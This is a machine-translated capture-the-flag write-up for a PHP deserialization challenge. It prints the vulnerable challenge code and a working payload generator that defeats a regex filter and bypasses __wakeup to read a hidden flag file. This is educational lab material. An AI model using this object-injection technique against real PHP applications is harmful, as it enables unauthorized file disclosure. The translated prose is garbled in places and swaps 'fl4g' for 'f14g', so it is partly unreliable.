Solution to the problem of unserialize3 in the advanced web area of the attack and defense world

<?php 
class Demo { 
    private $file = 'index.php';
    // Constructors , Call automatically when the variable is created ,__ Means magic method , When the conditions are met, it will automatically call 
    public function __construct($file) { 
        $this->file = $file; 
        //“->” stay PHP Equivalent to Python Of “.”, Methods used to call objects 
    }
    // Destructor , Call automatically when the variable is destroyed 
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
        // Print file The content in , Show the document to the reader 
/* highlight_file(filename,return)  Function to highlight the syntax of the file , If  return  Parameter is set to true, Then the function will return the highlighted code , Instead of outputting them . 
 The whole code means that when the file is destroyed, it will output $file Code for .at Symbol （@） stay PHP Used as an error control operator in . When the expression is attached @ The symbol , Error messages that may be generated by this expression will be ignored .*/

    // It will be called automatically when deserializing 
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
        // Change the file name to “index.php”
    } 
}
if (isset($_GET['var'])) { 
    /* Judgment variable var Is it created , Checks whether the variable is set and not NULL, This code is to detect whether it is passed get Requested var Variable */
    $var = base64_decode($_GET['var']); 
    // take var Explain base64 code 
    if (preg_match('/[oc]:\d+:/i', $var)) { 
    // matching var Whether there is a string in 
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
        // Deserialization var, This will call wakeup function 
    } 

} else { 
    highlight_file("index.php"); 
    // Highlight index.php, This is not the result we want 
} 
?>

The topic source code tells us flag stay f14g.php in , So we want to enter this file , that payload Need to meet ：
1、 It doesn't contain preg_match Or directly bypass preg_match function
2、 Deserialization bypasses wakeup function
So we use serialization to construct a var Pass in , Let variable value be equal to f14g.php, When the variable is destroyed, it will be displayed by the destructor f14g.php

structure payload Code ：

<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            $this->file = 'index.php'; 
        } 
    } 
}
$payload = new Demo('fl4g.php');// Create objects Demo, Its file The value is f14g.php
$payload = serialize($payload);// Serialization operation 
$payload = str_replace('O:4', 'O:+4',$payload);
// Will be one of the “0:4” Switch to “0:+4” So as to bypass the regularities 
$payload = str_replace(':1:', ':2:' ,$payload); 
// Number of objects in serialization “1” Change it to “2”, To bypass the wakeup function （ If the value of the number of objects recorded in the serialization is larger than the real number of objects, you can bypass wakeup）
// Nonprintable white space in serialization is equivalent to %00, It needs to be in payload Medium plus 
echo base64_encode($payload); // For parameters  base64  Code and print out 
?>